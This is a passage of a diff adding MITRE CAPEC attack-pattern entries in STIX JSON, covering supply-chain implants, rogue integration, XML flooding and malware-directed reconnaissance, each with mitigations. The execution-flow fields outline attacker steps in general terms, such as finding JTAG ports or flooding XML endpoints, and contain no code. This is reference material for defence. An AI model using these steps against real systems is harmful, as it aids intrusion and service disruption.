", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to the system after it has left the manufacturer but before it is deployed at the victim location." + ], + "x_capec_skills_required": { + "High": "Hardware creation and manufacture of replacement components." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that all contractors and sub-suppliers use trusted means of shipping (e.g., bonded/cleared/vetted and insured couriers) to ensure that components, once purchased, are not subject to compromise during their delivery.", + "id": "course-of-action--5d0d9e49-3036-4e81-987d-f0938def44da", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-522-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3e5d22fb-9a7a-4510-9013-518caaabf8fb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5d0d9e49-3036-4e81-987d-f0938def44da", + "spec_version": "2.1", + "target_ref": "attack-pattern--556f08be-d926-448c-b2c2-88a817a170a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent or detect tampering with critical hardware or firmware components while in transit through use of state-of-the-art anti-tamper devices.", + "id": "course-of-action--4b24a939-98c5-4cb3-993b-8237bb1e6b31", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-522-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--13c57eb4-2ac4-4e73-9f83-5f22cf4194c9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4b24a939-98c5-4cb3-993b-8237bb1e6b31", + "spec_version": "2.1", + "target_ref": "attack-pattern--556f08be-d926-448c-b2c2-88a817a170a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use tamper-resistant and tamper-evident packaging when shipping critical components (e.g., plastic coating for circuit boards, tamper tape, paint, sensors, and/or seals for cases and containers) and inspect received system components for evidence of tampering.", + "id": "course-of-action--1f214abb-be0a-4348-b681-5c21cc8c76ac", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-522-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b9712253-4163-4fb1-aca0-1392d19779d3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f214abb-be0a-4348-b681-5c21cc8c76ac", + "spec_version": "2.1", + "target_ref": "attack-pattern--556f08be-d926-448c-b2c2-88a817a170a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker implants malicious software into the system in the supply chain distribution channel, with purpose of causing malicious disruption or allowing for additional compromise when the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-523", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/523.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Daniel Simpson, Dani Halfin, Andrews Mariano Gorzelany, Beth Woodbury, Supply chain attacks, 2021--10---28, Microsoft", + "external_id": "REF-716", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/supply-chain-malware" + } + ], + "id": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Software Implanted", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--59ba3504-6764-48b4-980a-40e4adff2030" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "An attacker has created a piece of malicious software designed to function as a backdoor in a system that is to be deployed at the victim location. During shipment of the system, the attacker has physical access to the system at a loading dock of an integrator for a short time. The attacker unpacks and powers up the system and installs the malicious piece of software, and configures it to run upon system boot. The system is repackaged and returned to its place on the loading dock, and is shipped and installed at the victim location with the malicious software in place, allowing the attacker to bypass firewalls and remotely gain access to the victim's network for further malicious activities." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Entry Point: The adversary must first identify a system that they wish to target and search for an entry point they can use to install the malicious software. This could be a system which they have prior knowledge of, giving them insight into the software and environment.

    2. Techniques
    Use a JTAGulator to identify exposed JTAG and UART interfaces in smaller embedded systems.
    Identify exposed USB connectors that could be used to load software.

  2. Discover Vulnerability in Supply Chain: The adversary maps out the supply chain for the targeted system. They look for ooportunities to gain physical access to the system after it has left the manufacturer, but before it is deployed to the victim.

    3. Techniques
    Procure a system and observe the steps it takes in the shipment process.
    Identify possible warehouses that systems are stored after manufacturing.

Experiment

  1. Test Malicious Software: Before performing the attack in the wild, an adversary will test the attack on a system they have procured to ensure that the desired outcome will be achieved.

    2. Techniques
    Design malicious software that will give an adversary a backdoor into the system once it is deployed to the victim.
    Obtain already designed malicious software that just need to be placed into the system.

Exploit

  1. Implant Software in the Supply Chain: Using the vulnerability in the supply chain of the system discovered in the explore phase, the adversary implants the malicious software into the system. This results in the adversary gaining unintended access to systems once they reach the victim and can lead to a variety of follow up attacks.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to the system after it has left the manufacturer but before it is deployed at the victim location." + ], + "x_capec_skills_required": { + "High": "Malicious software creation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Deploy strong code integrity policies to allow only authorized apps to run.", + "id": "course-of-action--5cd8f024-ef85-4ead-a600-9a8e45e14265", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7977ee36-e9dd-4362-8a07-7921c10bfa77", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5cd8f024-ef85-4ead-a600-9a8e45e14265", + "spec_version": "2.1", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use endpoint detection and response solutions that can automaticalkly detect and remediate suspicious activities.", + "id": "course-of-action--4a4c56d3-bd9f-4a93-a13c-48bf19a739bd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a9e07347-a756-464a-9d08-127f1ed81bf7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4a4c56d3-bd9f-4a93-a13c-48bf19a739bd", + "spec_version": "2.1", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain a highly secure build and update infrastructure by immediately applying security patches for OS and software, implementing mandatory integrity controls to ensure only trusted tools run, and requiring multi-factor authentication for admins.", + "id": "course-of-action--be1960df-7044-4eff-a0c2-b2bc18a0b4c2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--17e26e5a-6708-4c5c-b559-87469e885b6f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--be1960df-7044-4eff-a0c2-b2bc18a0b4c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Require SSL for update channels and implement certificate transparency based verification.", + "id": "course-of-action--f7bcda54-37c4-4cb2-867e-a93b16bf0b1c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--90739ef7-b15d-4d24-bc46-6b8a4a460db0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7bcda54-37c4-4cb2-867e-a93b16bf0b1c", + "spec_version": "2.1", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Sign everything, including configuration files, XML files and packages.", + "id": "course-of-action--ed6f6199-c0e4-457b-bf01-c1c387be69cd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5c3b0185-14be-491f-9447-065542f68070", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ed6f6199-c0e4-457b-bf01-c1c387be69cd", + "spec_version": "2.1", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Develop an incident response process, disclose supply chain incidents and notify customers with accurate and timely information.", + "id": "course-of-action--515c3742-c198-44f2-bc02-7b6e8959db8d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fe330f06-2741-49df-9e82-3eea2c36031c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--515c3742-c198-44f2-bc02-7b6e8959db8d", + "spec_version": "2.1", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker alters or establishes rogue processes in an integration facility in order to insert maliciously altered components into the system. The attacker would then supply the malicious components. This would allow for malicious disruption or additional compromise when the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-524", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/524.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Daniel Simpson, Dani Halfin, Andrews Mariano Gorzelany, Beth Woodbury, Supply chain attacks, 2021--10---28, Microsoft", + "external_id": "REF-716", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/supply-chain-malware" + } + ], + "id": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Rogue Integration Procedures", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--59ba3504-6764-48b4-980a-40e4adff2030" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "An attacker gains access to a system integrator's documentation for the preparation of purchased systems designated for deployment at the victim's location. As a part of the preparation, the included 100 megabit network card is to be replaced with a 1 gigabit network card. The documentation is altered to reflect the type of 1 gigabit network card to use, and the attacker ensures that this type of network card is provided by the attacker's own supply. The card has additional malicious functionality which will allow for additional compromise by the attacker at the victim location once the system is deployed." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to an integration facility that prepares the system before it is deployed at the victim location." + ], + "x_capec_skills_required": { + "High": "Hardware creation and manufacture of replacement components." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bb65fed4-9856-4cc8-b152-6e50459d73cb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5cd8f024-ef85-4ead-a600-9a8e45e14265", + "spec_version": "2.1", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fa96d7c5-a195-4776-8593-4c3da18a0788", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4a4c56d3-bd9f-4a93-a13c-48bf19a739bd", + "spec_version": "2.1", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3e2b7ea2-a95c-44d2-88af-b8f040f18920", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--be1960df-7044-4eff-a0c2-b2bc18a0b4c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c109c7e5-daa6-42f0-81a6-5416db0cc058", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7bcda54-37c4-4cb2-867e-a93b16bf0b1c", + "spec_version": "2.1", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--219a5740-2430-4bff-9bab-743bd8be41d4", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ed6f6199-c0e4-457b-bf01-c1c387be69cd", + "spec_version": "2.1", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8c51a053-7c7e-4e4f-98a1-9bfa45da752c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--515c3742-c198-44f2-bc02-7b6e8959db8d", + "spec_version": "2.1", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain strong physical system access controls and monitor networks and physical facilities for insider threats.", + "id": "course-of-action--da4c5f85-68af-498c-a2cb-7dc95e9c7115", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-524-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5318f2ea-5803-44c4-883f-e69b2e824665", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--da4c5f85-68af-498c-a2cb-7dc95e9c7115", + "spec_version": "2.1", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using XML messages with the intent to deny legitimate users access to a web service. These attacks are accomplished by sending a large number of XML based requests and letting the service attempt to parse each one. In many cases this type of an attack will result in a XML Denial of Service (XDoS) due to an application becoming unstable, freezing, or crashing.", + "external_references": [ + { + "external_id": "CAPEC-528", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/528.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Endpoint Denial of Service:Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + }, + { + "description": "Network Denial of Service:Direct Network Flood", + "external_id": "T1498.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/001" + } + ], + "id": "attack-pattern--ad3913be-6ca6-48e6-9e3b-7b67e4162612", + "modified": "2022-02-22T00:00:00.000Z", + "name": "XML Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "XML Denial of Service (XML DoS)" + ], + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Consider the case of attack performed against the createCustomerBillingAccount Web Service for an online store. In this case, the createCustomerBillingAccount Web Service receives a huge number of simultaneous requests, containing nonsense billing account creation information (the small XML messages). The createCustomerBillingAccount Web Services may forward the messages to other Web Services for processing. The application suffers from a high load of requests, potentially leading to a complete loss of availability the involved Web Service." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an attacker records all instance of web services to process XML requests.

    2. Techniques
    Use an automated tool to record all instances of URLs to process XML requests.
    Use a browser to manually explore the website and analyze how the application processes XML requests.

Experiment

  1. An adversary crafts input data that may have an adverse effect on the operation of the web service when the XML data sent to the service.

Exploit

  1. Launch a resource depletion attack: The attacker delivers a large number of XML messages to the target URLs found in the explore phase at a sufficiently rapid rate. It causes denial of service to the target application.

    2. Techniques
    Send a large number of crafted XML messages to the target URL.
", + "x_capec_extended_description": "\n XDoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious XML payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. The main weakness in XDoS is that the service provider generally must inspect, parse, and validate the XML messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that XDoS targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--94238840-08ad-4117-8a20-ed359cda1e7e" + ], + "x_capec_prerequisites": [ + "The target must receive and process XML transactions.", + "An adverssary must possess the ability to generate a large amount of XML based messages to send to the target service." + ], + "x_capec_skills_required": { + "Low": "Denial of service" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--90c77905-bef0-451f-b726-1225d30da2de", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd", + "spec_version": "2.1", + "target_ref": "attack-pattern--ad3913be-6ca6-48e6-9e3b-7b67e4162612", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--56794f75-72f9-4d9c-8fe4-a17e9e46b6c5", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0208fb-20e5-4c4f-9a93-d5d806d038e6", + "spec_version": "2.1", + "target_ref": "attack-pattern--ad3913be-6ca6-48e6-9e3b-7b67e4162612", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversary uses malware or a similarly controlled application installed inside an organizational perimeter to gather information about the composition, configuration, and security mechanisms of a targeted application, system or network.", + "external_references": [ + { + "external_id": "CAPEC-529", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/529.html" + } + ], + "id": "attack-pattern--6f7f4589-3abb-4aa8-ac80-1a6715d75a8b", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Malware-Directed Internal Reconnaissance", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--c8c9dfbe-7a40-4041-84ff-89942878a2f4", + "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8" + ], + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have internal, logical access to the target network and system." + ], + "x_capec_resources_required": [ + "The adversary requires a variety of tools to collect information about the target. These include port/network scanners and tools to analyze responses from applications to determine version and configuration information. Footprinting a system adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected." + ], + "x_capec_skills_required": { + "Medium": "The adversary must be able to obtain or develop, as well as place malicious software inside the target network/system." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7dcaa766-8fbb-4cf2-9d26-1cb5b3739b11", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7d31992-837d-4b43-91fb-5fd7cffc161b", + "spec_version": "2.1", + "target_ref": "attack-pattern--6f7f4589-3abb-4aa8-ac80-1a6715d75a8b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify programs that may be used to acquire peripheral information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist.", + "id": "course-of-action--a2404315-1d87-4e47-a8e4-c6b2cfe457d8", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-529-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a65abf1a-adf4-4c4d-9dbb-1ad3f3be601b", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2404315-1d87-4e47-a8e4-c6b2cfe457d8", + "spec_version": "2.1", + "target_ref": "attack-pattern--6f7f4589-3abb-4aa8-ac80-1a6715d75a8b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If a string is passed through a filter of some kind, then a terminal NULL may not be 